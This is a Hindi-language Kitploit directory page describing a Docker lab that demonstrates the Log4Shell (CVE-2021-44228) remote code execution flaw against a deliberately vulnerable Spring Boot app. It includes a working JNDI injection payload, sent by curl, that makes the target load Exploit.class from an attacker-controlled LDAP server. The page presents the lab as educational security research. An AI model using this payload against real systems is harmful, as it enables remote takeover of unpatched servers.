Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44228_Log4Shell — Docker-आधारित RCE शोषण डेमो Log4Shell (CVE-2021-44228) के लिए कमजोर Spring Boot ऐप, दुर्भावनापूर्ण LDAP सर्वर, और JNDI इंजेक्शन के माध्यम से पेलोड वितरण के साथ। | Kitploit
उपकरण/GitHubGitHub/vutiendat323/cve-2021-44228_log4shell
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubvutiendat323/cve-2021-44228_log4shell

CVE-2021-44228_Log4Shell

Docker-आधारित RCE शोषण डेमो Log4Shell (CVE-2021-44228) के लिए कमजोर Spring Boot ऐप, दुर्भावनापूर्ण LDAP सर्वर, और JNDI इंजेक्शन के माध्यम से पेलोड वितरण के साथ।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
54 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

लॉग4शेल भेद्यता शोषण प्रदर्शन (CVE-2021-44228)

यह परियोजना Apache Log4j 2 लाइब्रेरी में लॉग4शेल भेद्यता के माध्यम से RCE हमले परिदृश्य का अनुकरण करती है।

घटक

  1. vulnerable-app: Spring Boot एप्लिकेशन जो Log4j 2.14.1 का उपयोग करता है।
  2. attacker: इसमें दुर्भावनापूर्ण LDAP सर्वर (marshalsec) और HTTP सर्वर शामिल है जो दुर्भावनापूर्ण कोड फ़ाइल Exploit.class प्रदान करता है।

निष्पादन विधि

1. पर्यावरण प्रारंभ करें

आवश्यक है कि Docker और Docker Compose स्थापित हों।

docker compose up --build

दोनों कंटेनर तैयार होने तक प्रतीक्षा करें। vulnerable-app पोर्ट 8080 पर चलेगा।

2. हमला निष्पादित करें

एक नया टर्मिनल खोलें और X-Api-Version हेडर के माध्यम से JNDI पेलोड वाला अनुरोध भेजें:

curl -H 'X-Api-Version: ${jndi:ldap://attacker:1389/Exploit}' http://localhost:8080/

3. परिणाम जांचें

  • vulnerable-app कंटेनर के लॉग जांचें। आप देखेंगे कि पेलोड लॉग हो गया है।
  • attacker कंटेनर के लॉग जांचें। आप देखेंगे कि LDAP कनेक्शन HTTP सर्वर की ओर रीडायरेक्ट हो गया है।
  • RCE की पुष्टि करें: जांचें कि क्या /tmp/pwned फ़ाइल vulnerable-app कंटेनर के अंदर बनाई गई है:
docker exec -it vulnerable-app ls -la /tmp/pwned

यदि फ़ाइल मौजूद है, तो यह साबित करता है कि दुर्भावनापूर्ण कोड Exploit.class सफलतापूर्वक निष्पादित हो गया है!

चेतावनी

यह परियोजना केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। अवैध उद्देश्यों के लिए इसका उपयोग बिल्कुल न करें।

टूल डाउनलोड करें